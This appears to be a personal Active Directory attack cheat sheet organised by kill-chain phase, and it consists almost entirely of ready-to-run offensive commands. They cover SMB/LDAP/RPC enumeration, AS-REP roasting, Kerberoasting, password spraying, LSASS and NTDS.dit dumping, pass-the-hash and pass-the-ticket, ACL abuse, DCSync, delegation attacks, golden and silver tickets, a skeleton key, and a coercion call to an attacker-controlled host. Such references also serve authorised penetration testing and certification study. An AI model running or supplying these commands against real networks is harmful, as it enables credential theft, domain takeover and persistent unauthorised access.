Everything I keep coming back to when attacking Active Directory. Organized by kill chain phase so you can find what you need fast.

Enumeration

SMB (port 445)

# Null session enum
nxc smb $IP -u '' -p ''
nxc smb $IP -u 'guest' -p ''

# List shares
nxc smb $IP -u $USER -p $PASS --shares
smbclient -L //$IP -N
smbmap -H $IP -u $USER -p $PASS

# Spider shares for juicy files
nxc smb $IP -u $USER -p $PASS -M spider_plus

# Connect to share
smbclient //$IP/$SHARE -U $USER%$PASS

# Recursive download entire share
smbget -R smb://$IP/$SHARE -U $USER%$PASS

Gotcha: Always try null session AND guest. Some DCs reject one but not the other.

LDAP (port 389/636)

# Anonymous bind
ldapsearch -x -H ldap://$IP -b "DC=domain,DC=local"

# Authenticated enum
ldapsearch -x -H ldap://$IP -D "$USER@domain.local" -w "$PASS" -b "DC=domain,DC=local"

# Dump users
ldapsearch -x -H ldap://$IP -D "$USER@domain.local" -w "$PASS" -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName

# Find domain admins
ldapsearch -x -H ldap://$IP -D "$USER@domain.local" -w "$PASS" -b "DC=domain,DC=local" "(&(objectClass=group)(cn=Domain Admins))" member

# nxc LDAP enum
nxc ldap $IP -u $USER -p $PASS --users
nxc ldap $IP -u $USER -p $PASS --groups

RPC (port 135/593)

# Connect
rpcclient -U "" -N $IP
rpcclient -U "$USER%$PASS" $IP

# Inside rpcclient
enumdomusers
enumdomgroups
queryuser 0x1f4
querygroupmem 0x200
getdompwinfo

DNS

# Zone transfer
dig axfr domain.local @$IP

# Reverse lookup brute
dnsrecon -r 10.10.10.0/24 -n $IP

Full User Enumeration

# Kerbrute - find valid usernames (no auth needed)
kerbrute userenum -d domain.local --dc $IP /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

# RID brute force
nxc smb $IP -u 'guest' -p '' --rid-brute 10000
lookupsid.py domain.local/guest@$IP -no-pass

Tip: RID brute is gold. Even with minimal access you often get the full user list.

BloodHound

Collection

# From Linux (remote)
bloodhound-python -d domain.local -u $USER -p $PASS -ns $IP -c all

# From Windows
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All

# Or the exe
.\SharpHound.exe -c all

Key Queries

Mark owned users first, then check:

  • Shortest Paths to Domain Admins — the money query
  • Find AS-REP Roastable UsersDONT_REQUIRE_PREAUTH
  • Find Kerberoastable Users — SPNs with admin paths
  • Shortest Paths from Owned Principals — what can you reach right now
  • Find Computers Where Domain Users Are Local Admin

Custom Cypher Queries

# Users with DCSync rights
MATCH (n)-[:MemberOf|HasSIDHistory*1..]->(g:Group)-[:DCSync|GetChanges|GetChangesAll]->(d:Domain) RETURN n.name, g.name

# Unconstrained delegation computers
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c.name

# Users with GenericAll on other users
MATCH (u:User)-[:GenericAll]->(t:User) RETURN u.name, t.name

Credential Attacks

AS-REP Roasting

No password needed. Targets users with “Do not require Kerberos preauthentication” set.

# Find and roast
GetNPUsers.py domain.local/ -no-pass -usersfile users.txt -dc-ip $IP
GetNPUsers.py domain.local/ -no-pass -request -dc-ip $IP

# nxc
nxc ldap $IP -u $USER -p $PASS --asreproast asrep.txt

# Crack
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

Kerberoasting

Need valid creds. Requests TGS tickets for service accounts → crack offline.

# Impacket
GetUserSPNs.py domain.local/$USER:$PASS -dc-ip $IP -request

# nxc
nxc ldap $IP -u $USER -p $PASS --kerberoasting kerb.txt

# From Windows
# Rubeus
.\Rubeus.exe kerberoast /outfile:kerb.txt

# PowerView
Invoke-Kerberoast -OutputFormat Hashcat | fl

# Crack
hashcat -m 13100 kerb.txt /usr/share/wordlists/rockyou.txt

Gotcha: Target accounts with AdminCount=1 first. No point cracking a service account with no privileges.

Password Spraying

# nxc — best option, shows lockout warnings
nxc smb $IP -u users.txt -p 'Password123!' --continue-on-success

# Kerbrute — stealthier, no logon events
kerbrute passwordspray -d domain.local --dc $IP users.txt 'Password123!'

Warning: Check the account lockout policy first.

nxc smb $IP -u $USER -p $PASS --pass-pol

Common spray candidates: Season+Year! (Spring2026!), Company+123, Welcome1.

Credential Dumping

# SAM dump (need admin on target)
nxc smb $IP -u $ADMIN -p $PASS --sam
secretsdump.py domain.local/$ADMIN:$PASS@$IP

# LSA secrets
nxc smb $IP -u $ADMIN -p $PASS --lsa

# LSASS dump
nxc smb $IP -u $ADMIN -p $PASS -M lsassy
nxc smb $IP -u $ADMIN -p $PASS -M nanodump

# NTDS.dit (domain controller — game over)
secretsdump.py domain.local/$ADMIN:$PASS@$DC_IP -just-dc
nxc smb $DC_IP -u $ADMIN -p $PASS --ntds

Lateral Movement

Pass the Hash (PtH)

Got an NTLM hash? Use it directly.

# nxc — check where hash works
nxc smb $SUBNET/24 -u $USER -H $HASH

# Evil-WinRM
evil-winrm -i $IP -u $USER -H $HASH

# PsExec
psexec.py domain.local/$USER@$IP -hashes :$HASH

# WMI
wmiexec.py domain.local/$USER@$IP -hashes :$HASH

# DCOM
dcomexec.py domain.local/$USER@$IP -hashes :$HASH

# RDP (restricted admin mode)
xfreerdp /v:$IP /u:$USER /pth:$HASH /cert-ignore

Tip: wmiexec is stealthier than psexec — no service installation. psexec drops a binary and creates a service. OPSEC matters even in labs.

Pass the Ticket (PtT)

# Request TGT with password
getTGT.py domain.local/$USER:$PASS

# Request TGT with hash
getTGT.py domain.local/$USER -hashes :$HASH

# Use the ticket
export KRB5CCNAME=./user.ccache
psexec.py domain.local/$USER@$TARGET -k -no-pass
evil-winrm -i $TARGET -r domain.local

WinRM (port 5985/5986)

evil-winrm -i $IP -u $USER -p $PASS
evil-winrm -i $IP -u $USER -H $HASH

# Upload/download inside evil-winrm
upload /path/to/file
download C:\path\to\file

RDP (port 3389)

xfreerdp /v:$IP /u:$USER /p:$PASS /cert-ignore +clipboard /dynamic-resolution

PsExec Variants

psexec.py domain.local/$USER:$PASS@$IP
smbexec.py domain.local/$USER:$PASS@$IP   # no binary drop
atexec.py domain.local/$USER:$PASS@$IP "whoami"  # scheduled task

Privilege Escalation

ACL Abuse

Found via BloodHound edges. The big ones:

PermissionAbuse
GenericAll on userReset password, set SPN, disable preauth
GenericAll on groupAdd yourself to group
GenericWrite on userSet SPN → Kerberoast, write logon script
WriteDACLGrant yourself any permission
WriteOwnerTake ownership → WriteDACL → GenericAll
ForceChangePasswordReset password without knowing current
AddMemberAdd yourself to group
# ForceChangePassword (from Linux)
net rpc password $TARGET_USER $NEWPASS -U domain.local/$USER%$PASS -S $DC_IP
rpcclient -U "$USER%$PASS" $DC_IP -c "setuserinfo2 $TARGET_USER 23 'NewPass123!'"

# Add user to group
net rpc group addmem "Domain Admins" $USER -U domain.local/$CONTROLLED_USER%$PASS -S $DC_IP

# From Windows with PowerView
# GenericAll on user → reset password
Set-DomainUserPassword -Identity $TARGET -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)

# WriteDACL → grant DCSync
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity $USER -Rights DCSync

# Add to group
Add-DomainGroupMember -Identity "Domain Admins" -Members $USER

DCSync

Need Replicating Directory Changes + Replicating Directory Changes All privileges. Domain Admins have this by default.

# Dump specific user
secretsdump.py domain.local/$USER:$PASS@$DC_IP -just-dc-user Administrator

# Dump everything
secretsdump.py domain.local/$USER:$PASS@$DC_IP -just-dc

# From Windows (Mimikatz)
lsadump::dcsync /domain:domain.local /user:Administrator

Token Impersonation

# Check privileges (on Windows target)
whoami /priv

Key privileges:

PrivilegeAttack
SeImpersonatePrivilegePotato attacks (JuicyPotato, PrintSpoofer, GodPotato)
SeBackupPrivilegeCopy NTDS.dit and SYSTEM hive
SeRestorePrivilegeWrite to any file, DLL hijack
SeTakeOwnershipPrivilegeTake ownership of objects

Unconstrained Delegation

Computer has TRUSTED_FOR_DELEGATION. Any user authenticating to it has their TGT cached.

# Find unconstrained delegation machines
findDelegation.py domain.local/$USER:$PASS -dc-ip $DC_IP

# Coerce auth to our controlled machine (e.g., Printerbug)
python3 printerbug.py domain.local/$USER:$PASS@$DC_IP $ATTACKER_IP

# Capture TGT with Rubeus on the compromised machine
.\Rubeus.exe monitor /interval:5

Constrained Delegation

# Find constrained delegation
findDelegation.py domain.local/$USER:$PASS -dc-ip $DC_IP

# S4U attack — impersonate admin to allowed service
getST.py domain.local/$SVC_USER:$PASS -spn $TARGET_SPN -impersonate Administrator -dc-ip $DC_IP
export KRB5CCNAME=Administrator.ccache
psexec.py domain.local/Administrator@$TARGET -k -no-pass

Resource-Based Constrained Delegation (RBCD)

Need GenericWrite or GenericAll on a computer object.

# Add a machine account
addcomputer.py domain.local/$USER:$PASS -computer-name 'FAKE$' -computer-pass 'Passw0rd!'

# Set msDS-AllowedToActOnBehalfOfOtherIdentity
rbcd.py domain.local/$USER:$PASS -delegate-from 'FAKE$' -delegate-to $TARGET$ -action write -dc-ip $DC_IP

# Get service ticket as admin
getST.py domain.local/'FAKE$':'Passw0rd!' -spn cifs/$TARGET -impersonate Administrator -dc-ip $DC_IP
export KRB5CCNAME=Administrator.ccache
psexec.py domain.local/Administrator@$TARGET -k -no-pass

Domain Persistence

Golden Ticket

Need the krbtgt hash (from DCSync).

# Get krbtgt hash
secretsdump.py domain.local/$ADMIN:$PASS@$DC_IP -just-dc-user krbtgt

# Forge golden ticket (Impacket)
ticketer.py -nthash $KRBTGT_HASH -domain-sid $DOMAIN_SID -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache

# Mimikatz
kerberos::golden /user:Administrator /domain:domain.local /sid:$DOMAIN_SID /krbtgt:$KRBTGT_HASH /ptt

Silver Ticket

Forge a TGS for a specific service. Need the service account’s NTLM hash.

ticketer.py -nthash $SVC_HASH -domain-sid $DOMAIN_SID -domain domain.local -spn cifs/$TARGET Administrator
export KRB5CCNAME=Administrator.ccache

Skeleton Key

# Mimikatz on DC — patches LSASS, any user can auth with "mimikatz" as password
privilege::debug
misc::skeleton

Hashcat Quick Reference

Hash TypeModeExample
NTLM1000hashcat -m 1000 hash.txt wordlist
NetNTLMv25600hashcat -m 5600 hash.txt wordlist
AS-REP18200hashcat -m 18200 hash.txt wordlist
Kerberoast (TGS-REP RC4)13100hashcat -m 13100 hash.txt wordlist
Kerberoast (TGS-REP AES256)19700hashcat -m 19700 hash.txt wordlist
DCC2 (mscachev2)2100hashcat -m 2100 hash.txt wordlist

Quick Wins Checklist

  1. Null/guest SMB access → shares, user lists
  2. AS-REP Roast → only needs usernames
  3. Kerberoast → any valid creds
  4. Password spraySeason+Year! format
  5. LLMNR/NBT-NS poisoning → Responder for hashes
  6. Check BloodHound edges from every user you own
  7. Credential reuse → always spray found creds across all hosts
  8. GPP passwordsgpp-decrypt
  9. SYSVOL scripts → hardcoded creds in .bat/.vbs/.ps1 files
  10. Description fields → passwords in user descriptions
# Responder
responder -I tun0 -dwPv

# Check for GPP passwords
nxc smb $IP -u $USER -p $PASS -M gpp_password